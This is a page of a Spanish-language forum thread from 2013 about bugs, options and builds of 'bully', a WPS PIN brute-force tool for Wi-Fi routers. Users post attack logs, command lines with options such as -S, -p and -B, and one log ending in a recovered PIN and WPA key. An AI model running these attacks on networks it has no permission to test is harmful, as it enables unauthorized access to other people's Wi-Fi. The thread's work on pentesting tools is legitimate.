Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
23-09-2014, 12:18 (Martes)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Test de potencia en milivatios/dbm de adaptadores usb wifi



+  Seguridad Wireless - Wifi
|-+  Desarrollo de scripts y aplicaciones
| |-+  Aplicaciones y diccionarios linux (Moderador: NirozMe|on)
| | |-+  BULLY: Mejoras, bugs, aclaraciones, etc.
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 [2] 3 4 5 6 7 8 Ir Abajo Imprimir
Autor Tema: BULLY: Mejoras, bugs, aclaraciones, etc.  (Leído 31363 veces)
alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #20 : 06-09-2013, 14:46 (Viernes) »

nice!
Brian is reading this thread.
thanks for testing, jar229!
En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
bdpurcell
**
Desconectado Desconectado

Mensajes: 20


Ver Perfil
« Respuesta #21 : 07-09-2013, 04:54 (Sbado) »

Gracias por tomarse el tiempo para probar jar229! Buena noticia.

Tengo curiosidad, ¿alguien ha visto un problema con bully encontrar la primera mitad de la espiga, y después no cierre correctamente? Sería algo así:

...
[] Rx (M5) = 'Pin1Bad' Siguiente pin '50082803 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '33122809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '53302809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '01522808 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '45432804 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '49092806 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909953x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909612x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909054x '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '72832806 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '87562804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '38812804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '70212808 '
...

Finalmente diría "Agotada posibilidades primera media sin éxito", ya que no estaba cerrada correctamente en 4909xxxx. Caso raro, pero me pregunto si la gente ha visto.

Tengo el fin de semana, así que voy a estar trabajando en bully ampliamente.

Me gustaría decir que sin la retroalimentación de los usuarios y los profesionales como ustedes, matón sería un proyecto muerto. Gracias a todos, especialmente alister y jar229 por sus contribuciones.

Brian

Traducción proporcionada por Google
En línea
pedroram
**
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #22 : 07-09-2013, 12:21 (Sbado) »

Una manera de obligarle a que haga el primer cuarteto de manera secuencial, es metiendole la opción -S -p 0XXX . Ese cuarteto lo toma como si fuesen el cero el ultimo digito del primer cuarteto y los otros tres digitos, como si fuesen parte del segundo cuarteto.

Funciona bastante mas rápido que el reaver, la verdad.
En línea
jar229
Colaborador
*
Desconectado Desconectado

Mensajes: 3859



Ver Perfil
« Respuesta #23 : 07-09-2013, 13:51 (Sbado) »

Un placer, poder ayudar.

Si hay algún tipo de test que quieras que haga .. avisa Grin

Enviado desde mi CUBOT GT99 usando Tapatalk 4
En línea

ROUTERS EN VENTA
1 x Comtrend VR-3025u con OpenWrt
1 x Comtrend VR-3025un con OpenWrt
1 x Alpha ASL26555 con OpenWRT
2 x Huawei HG553 con OpenWRT
2 x Comtrend ar5387un con OpenWRT


[FAQ] Preguntas más comunes sobre OpenWrt
[Índice] Hilos relevantes de OpenWrt
¡¡¡ NO contestaré mensajes privados sobre temas que puedan tratarse en el foro !!!
alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #24 : 07-09-2013, 17:14 (Sbado) »

Gracias por tomarse el tiempo para probar jar229! Buena noticia.

Tengo curiosidad, ¿alguien ha visto un problema con bully encontrar la primera mitad de la espiga, y después no cierre correctamente? Sería algo así:

...
[] Rx (M5) = 'Pin1Bad' Siguiente pin '50082803 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '33122809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '53302809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '01522808 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '45432804 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '49092806 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909953x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909612x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909054x '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '72832806 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '87562804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '38812804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '70212808 '
...

Finalmente diría "Agotada posibilidades primera media sin éxito", ya que no estaba cerrada correctamente en 4909xxxx. Caso raro, pero me pregunto si la gente ha visto.

Tengo el fin de semana, así que voy a estar trabajando en bully ampliamente.

Me gustaría decir que sin la retroalimentación de los usuarios y los profesionales como ustedes, matón sería un proyecto muerto. Gracias a todos, especialmente alister y jar229 por sus contribuciones.

Brian

Traducción proporcionada por Google

lo que pregunta brian es si hemos notado que no funciona el "lock" de la primera mitad del PIN. Es decir, despues de adivinar la primera mitad, sigue cambiando en lugar de mantenerla fija.

Personalmente, siempre me falla este aspecto del programa.

thanks to you, Brian, for coding bully and for listening to us. We are we can contribute to such valuable pentesting tool.
« Última modificación: 07-09-2013, 17:15 (Sbado) por alister » En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #25 : 07-09-2013, 17:18 (Sbado) »

Una manera de obligarle a que haga el primer cuarteto de manera secuencial, es metiendole la opción -S -p 0XXX . Ese cuarteto lo toma como si fuesen el cero el ultimo digito del primer cuarteto y los otros tres digitos, como si fuesen parte del segundo cuarteto.

Funciona bastante mas rápido que el reaver, la verdad.
Estas seguro de esto?

teoricamente bully solo deberia aceptar el parámetro -p si el argumento tiene SIETE cifras, por ejemplo:
bully -S -p 0123456

ejecutando el comando que propones:
bully -S -p 0123
deberia arrojar un error

PD: quizas me equvoco? tendré que revisar el código de nuevo
« Última modificación: 07-09-2013, 17:19 (Sbado) por alister » En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
USUARIONUEVO
Colaborador
*
Desconectado Desconectado

Mensajes: 9498



Ver Perfil
« Respuesta #26 : 08-09-2013, 04:11 (Domingo) »

revision svn 14

acepta pines ( siete primeros caracteres )

SOLO ES NECESARIO USAR    -p XXXXXXX    SIN MASSSSS


____________________________

I dont like the method to write de *.run file when get de PIN & KEY

# Do Not Modify
# 'ESSID' (XX:XX:XX:XX:XX:XX)
# session ended 2013-09-08 03:55:34 with signal 0
8XXXXXX:8XXXXXX:i4Ag26riFBXXXXXXXXXX:

I THNIK 3 THINGS

Why only 7 digits pin  
Why write 2 times the pin ?
Is not better option separate parts ?

Like that like this  Grin

PIN = 8XXXXXXX  -->> ENTIRELY
KEY = XXXXXXXXXXXXX


some like this ...

# Do Not Modify
# 'ESSID' (XX:XX:XX:XX:XX:XX)
# session ended 2013-09-08 03:55:34 with signal 0
PIN = XXXXXXXX
KEY = XXXXXXXXXXXXXXXXXXX




« Última modificación: 08-09-2013, 04:11 (Domingo) por USUARIONUEVO » En línea

USUARIONUEVO
Colaborador
*
Desconectado Desconectado

Mensajes: 9498



Ver Perfil
« Respuesta #27 : 08-09-2013, 04:18 (Domingo) »

Actualizando bully desde svn a ultimas versiones.


Código:
svn checkout http://bully.googlecode.com/svn/trunk/ bully-read-only

Código:
cd ~/bully-read-only/src

Código:
make


El siguiente paso logico seria make install , pero como wifislax tiene el binario en /usr/bin  ..lo moveremos en vez de instalarlo.

Código:
mv bully /usr/bin/bully

Y ahora limpiaremos , por que ya lo hemos instalado

Código:
cd ~

Código:
rm -Rf ~/bully*
En línea

USUARIONUEVO
Colaborador
*
Desconectado Desconectado

Mensajes: 9498



Ver Perfil
« Respuesta #28 : 08-09-2013, 07:29 (Domingo) »

Bully svn 14 , aparently FIX , correctly de 4 first digits ....

and parameter -p XXXXXXX  works well ... 1 attent and get wpa key




« Última modificación: 08-09-2013, 07:39 (Domingo) por USUARIONUEVO » En línea

alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #29 : 09-09-2013, 10:23 (Lunes) »

@USUARIONUEVO:

dado que brian está ya registrado en el foro y leyendo este hilo, le dejo que te responda a tus observaciones, pero básicamente estamos todos pensando y observando lo mismo.
PD: el tema de los 7 digitos en el pin, ya está previsto que se cambiará permitir 8 y así facilitar el ataque a routers no estandar
__
provided that brian is registered at this forum and reading this thread already, I let him answer to your observations, but we are basically thinking and noticing the same.
PS: regarding the 7 digit only pin, changing to allow 8 digits that's already on the roadmap in order to ease attacking non fully WPS compliant APs

En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #30 : 09-09-2013, 10:25 (Lunes) »

Actualizando bully desde svn a ultimas versiones.
Código:
rm -Rf ~/bully*

rm -Rf ~/.bully*

dont forget that dot :- P


EPIC FAIL
sorry
« Última modificación: 09-09-2013, 12:01 (Lunes) por alister » En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
USUARIONUEVO
Colaborador
*
Desconectado Desconectado

Mensajes: 9498



Ver Perfil
« Respuesta #31 : 09-09-2013, 11:49 (Lunes) »

Actualizando bully desde svn a ultimas versiones.
Código:
rm -Rf ~/bully*

rm -Rf ~/.bully*

dont forget that dot :- P

FAIL melón ...si haces eso ue tu pones ...eliminas el directorio donde bully te guarda los *.run

la idea de  rm -Rf ~/bully*

es simple y llanamente eliminar el code bajado por svn en la carpeta bully-read-only

lo que pasa que para no escribir todo el name..dije, pue sasterisco y acabo antes.

Lo correcto habría sido


rm -Rf ~/bully-read-aonly

Pero los pasos que puse están perfectos, ya que lo fui pasando por Shell y copiando directamente al post-

De todas maneras tu mismo ya te habrá dao cuenta ...  ¿ para que quiero borrar la carpeta de config de bully con mis ataques a medias etc ?

La idea es solo borrar lo bajado del svn ,el source.  Azn
En línea

alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #32 : 09-09-2013, 12:01 (Lunes) »

ah, cierto. no capté la idea de tu comando.
me hago el harakiri y vuelvo xD
En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
USUARIONUEVO
Colaborador
*
Desconectado Desconectado

Mensajes: 9498



Ver Perfil
« Respuesta #33 : 09-09-2013, 12:23 (Lunes) »

ah, cierto. no capté la idea de tu comando.
me hago el harakiri y vuelvo xD


Es normal , no semos maquinas.

Pero que nadie elimine

.bully ..por que iran a tu casa a buscarte  Grin

sobretodo si tienen algún atauqe a medias,con un par de horas hechadas...jajaja  Evil
En línea

Blackleg
****
Desconectado Desconectado

Mensajes: 57


Ver Perfil
« Respuesta #34 : 11-09-2013, 00:57 (Mircoles) »

[Pregunta tonta:

¿Como saber si el WPS esta activado sin tener el router delante?



Código:
wash
  Azn
« Última modificación: 11-09-2013, 01:02 (Mircoles) por Blackleg » En línea
alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #35 : 11-09-2013, 01:18 (Mircoles) »

[Pregunta tonta:

¿Como saber si el WPS esta activado sin tener el router delante?



Código:
wash
  Azn


ya te iba a empalar con una caña rota! jajajaja
En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
Blackleg
****
Desconectado Desconectado

Mensajes: 57


Ver Perfil
« Respuesta #36 : 11-09-2013, 13:21 (Mircoles) »

[Pregunta tonta:

¿Como saber si el WPS esta activado sin tener el router delante?



Código:
wash
  Azn


ya te iba a empalar con una caña rota! jajajaja

Ya le podías sacar punta, que me lo merecía.
En línea
ManuMoore
Deep Moore Inside
*******
Desconectado Desconectado

Mensajes: 860



Ver Perfil
« Respuesta #37 : 11-09-2013, 16:54 (Mircoles) »

T.T
En línea

"La libertad de una persona termina donde empieza la de otra."
pedroram
**
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #38 : 11-09-2013, 21:47 (Mircoles) »

Una manera de obligarle a que haga el primer cuarteto de manera secuencial, es metiendole la opción -S -p 0XXX . Ese cuarteto lo toma como si fuesen el cero el ultimo digito del primer cuarteto y los otros tres digitos, como si fuesen parte del segundo cuarteto.

Funciona bastante mas rápido que el reaver, la verdad.
Estas seguro de esto?

teoricamente bully solo deberia aceptar el parámetro -p si el argumento tiene SIETE cifras, por ejemplo:
bully -S -p 0123456

ejecutando el comando que propones:
bully -S -p 0123
deberia arrojar un error

PD: quizas me equvoco? tendré que revisar el código de nuevo

Si. fue con la version 4.6 de wifislax instalada en HDD, con la version 1.3 de bully.

Despues intenté compilar la 1.4, y me dió este error el bully. He bajado la ultima ISO la he instalado en HDD y me sigue dando el mismo error (variando la frecuencia)

wifislax ~ # bully -e xxxxxxxxxxx -S -p 0123 mon0
[X] Unknown frequency '2422' reported by interface 'mon0'
wifislax ~ #

==========================================================

Por abrir la bocaza.....

wifislax ~ # bully -e xxxxxxxxXXXX -c 3 -S -p 0123 mon0
  • Switching interface 'mon0' to channel '3'
  • [!] Using 'XX:XX:XX:XX:XX:XX'  for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'xxxxxxxxXXXX' on channel '3'
  • Got beacon for 'xxxxxxxxXXXX' (XX:XX:XX:XX:XX:XX)
  • Index of starting pin number is '0000123'
  • Last State = 'NoAssoc'   Next pin '00001236'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00011235'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00021234'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00031233'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00041232'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00051231'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00061230'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00071239'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00081238'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00091237'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00101233'
^C
Saved session to '/root/.bully/XX:XX:XX:XX:XX:XX.run'

wifislax ~ # bully -e xxxxxxxxXXXX -c 3 -S -p XXXXXX0 mon0
  • Switching interface 'mon0' to channel '3'
  • [!] Using 'XX:XX:XX:XX:XX:XX' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'xxxxxxxxXXXX' on channel '3'
  • Got beacon for 'xxxxxxxxXXXX' (XX:XX:XX:XX:XX:XX)
  • [!] Restoring session from '/root/.bully/XX:XX:XX:XX:XX:XX.run'
  • Index of starting pin number is 'XXXXXX0'
  • Last State = 'NoAssoc'   Next pin 'XXXXXX04'
  • Rx(  M7  ) = 'Pin2Bad'   Next pin 'XXXXXX11'
  • Rx(  M7  ) = 'Pin2Bad'   Next pin 'ZZZZZZZZ'
  • Pin is '15782328', key is 'XXXXXXXX'
Saved session to '/root/.bully/XX:XX:XX:XX:XX:XX.run'

   PIN : 'ZZZZZZZZ'
   KEY : 'XXXXXXXX'


« Última modificación: 11-09-2013, 22:06 (Mircoles) por pedroram » En línea
alister
*******
Desconectado Desconectado

Mensajes: 5487


Ver Perfil
« Respuesta #39 : 11-09-2013, 22:01 (Mircoles) »

nueva version de bully con soporte para routers que incumplen el checksum de WPS PIN (véase el ASL-26555 de movistar)

Brian ha añadido una nueva opción "-B" para habilitar este modo de operación que hace exactamente lo mismo que hacian las diferentes modificaciones del reaver que diferentes investigadores realizaron previamente (véase el "reaver wifislax" y el reaver modificado por notepad).

Citar
  -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]

para descargarlo:
Código:
git clone https://github.com/bdpurcell/bully.git

@pedro
prueba esta la version nueva de bully con la ultima de wifislax y nos cuentas. aunque tiene pinta de que tu problema es otro.
En línea

Hay dos palabras que sería divertido prohibir y banear automáticamente en los titulos de los temas en los foros.

la primera es AYUDA, por insulsa y obvia.

la segunda es URGENTE, por plantear una exigencia.
Páginas: 1 [2] 3 4 5 6 7 8 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines